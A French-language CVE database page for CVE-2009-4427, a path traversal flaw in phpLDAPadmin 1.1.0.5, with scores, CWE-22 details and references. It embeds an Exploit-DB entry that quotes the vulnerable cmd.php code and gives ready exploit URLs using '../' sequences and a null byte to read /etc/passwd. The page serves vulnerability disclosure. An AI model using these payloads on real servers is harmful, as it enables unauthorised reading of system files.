CVE-2009-4427 : Détail

CVE-2009-4427

Directory Traversal
A01-Broken Access Control
1.15%V3
Network
2009-12-28
17h27 +00:00
2010-03-26
08h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Directory traversal vulnerability in cmd.php in phpLDAPadmin 1.1.0.5 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the cmd parameter.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 10410

Date de publication : 2009-12-09 23h00 +00:00
Auteur : ipsecs
EDB Vérifié : Yes

######################################################################## # PHPLDAPADMIN LOCAL FILE INCLUSION ######################################################################## author : ipsecs website : http://ipsecs.com Date : December, 10th, 2009 -[i]- Description "Phpldapadmin is web based LDAP client which provides easy, anywhere-accessible, multi-language administration for LDAP server." http://phpldapadmin.sourceforge.net vulnerable version: phpldapadmin 1.1.0.5 Ubuntu 8.10 Debian 5.0 Other version may be affected -[ii]- Vulnerable Code Vulnerable code is found in cmd.php which doesn't sanitize URI parameter provided by user input. line 10 $www['cmd'] = get_request('cmd','REQUEST'); line 22-27 if (defined('HOOKSDIR') && file_exists(HOOKSDIR.$www['cmd'].'.php')) $file = HOOKSDIR.$www['cmd'].'.php'; elseif (defined('HTDOCDIR') && file_exists(HTDOCDIR.$www['cmd'].'.php')) $file = HTDOCDIR.$www['cmd'].'.php'; line 38-39 if ($file) include $file; Attacker may view any arbitrary files trough 'cmd' parameter in URI request. -[iii]- Exploit http://server/phpldapadmin/cmd.php?cmd=../../../../etc/passwd%00 http://server/phpldapadmin/cmd.php?cmd=../../../../issue%00 -[iv]- Fix Sanitize $file before being included. Unfortunaltely there is no working patch at this time.

Products Mentioned

Configuraton 0

Phpldapadmin_project>>Phpldapadmin >> Version 1.1.0.5

Références

http://www.mandriva.com/security/advisories?name=MDVSA-2010:023
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.osvdb.org/61139
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/37848
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.exploit-db.com/exploits/10410
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/37327
Tags : vdb-entry, x_refsource_BID